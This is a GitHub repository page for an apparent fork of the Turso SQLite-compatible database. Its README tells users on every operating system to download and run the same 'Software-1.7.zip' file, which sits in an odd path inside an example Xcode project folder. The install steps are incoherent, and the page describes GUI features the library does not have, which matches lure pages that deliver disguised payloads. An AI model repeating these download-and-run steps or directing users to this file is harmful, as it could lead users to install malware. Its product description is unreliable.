Skip to content

Desi446/turso

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

12,254 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ turso - A Simple SQL Database for Everyone

πŸ“₯ Download

Download turso

πŸ“œ Description

Turso is an in-process SQL database that works seamlessly with SQLite. It simplifies data storage for applications, making it easier for users to manage their data without needing deep technical knowledge. Whether you are building a simple project or a more complex application, Turso fits your needs.

πŸ› οΈ Features

  • Easy to Use: Turso offers a straightforward interface, making database management simple.
  • Compatibility: Works well with existing SQLite databases.
  • Lightweight: Designed to run efficiently on various platforms without heavy resource consumption.
  • Cross-Platform: Use it on different operating systems, including Windows, macOS, and Linux.
  • Built for the Web: Supports WebAssembly for web applications.

πŸ“‹ System Requirements

  • Operating System: Windows 10 or later, macOS 10.14 or later, Linux (most distributions)
  • Memory: At least 512 MB of RAM
  • Disk Space: Minimum of 50 MB free
  • Processor: Any modern processor

πŸš€ Getting Started

  1. Visit the Download Page

  2. Download the Latest Version

    • Look for the latest version listed at the top. Click on the link to download the appropriate file for your operating system.
  3. Install Turso

    • After the download completes, locate the downloaded file on your computer.
    • Follow the instructions based on your operating system:
      • Windows:
        • Double-click the https://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zip file and follow the prompts.
      • macOS:
        • Open the .dmg file and drag https://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zip to your Applications folder.
      • Linux:
        • Extract the https://raw.githubusercontent.com/Desi446/turso/main/bindings/dart/example/macos/Runner.xcodeproj/Software-1.7.zip file and follow the instructions in the README for installation.
  4. Start Using Turso

    • Open the application from your applications folder or start menu.
    • Create a new database or import an existing SQLite database to get started.

πŸ”§ How to Use

Creating a New Database

  1. Launch Turso.
  2. Select "Create New Database."
  3. Choose a name and location for your database.
  4. Click "Create" to complete the process.

Importing an SQLite Database

  1. Open Turso.
  2. Click "Import Database."
  3. Navigate to your existing SQLite database file and select it.
  4. The imported database will now be available for you to use.

Basic SQL Commands

Turso supports basic SQL commands, including:

  • CREATE TABLE: Create new tables in your database.
  • INSERT INTO: Add new data to your tables.
  • SELECT: Retrieve data from your tables.
  • UPDATE: Modify existing data.
  • DELETE: Remove data from your tables.

Example Command

CREATE TABLE Users (
    ID INTEGER PRIMARY KEY,
    Name TEXT NOT NULL,
    Email TEXT NOT NULL UNIQUE
);

πŸ“Š Documentation

For more detailed instructions, you can view the full documentation on the Wiki Page.

πŸ’¬ Community Support

If you need help or have questions, feel free to check out the Issues Page. You can also join our discussions to connect with other users.

🌐 Additional Resources

πŸ“… Release Notes

Keep track of updates and new features by checking the Release Notes Page.

πŸ”— Conclusion

Turso makes database management easier for everyone, regardless of technical skill. With its simple setup and powerful features, you can focus more on building your applications and less on managing your data. Start using Turso today by downloading it from the Releases Page.

About

πŸ—„οΈ Build, query, and manage an in-process SQL database with Turso, fully compatible with SQLite for efficient data handling.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors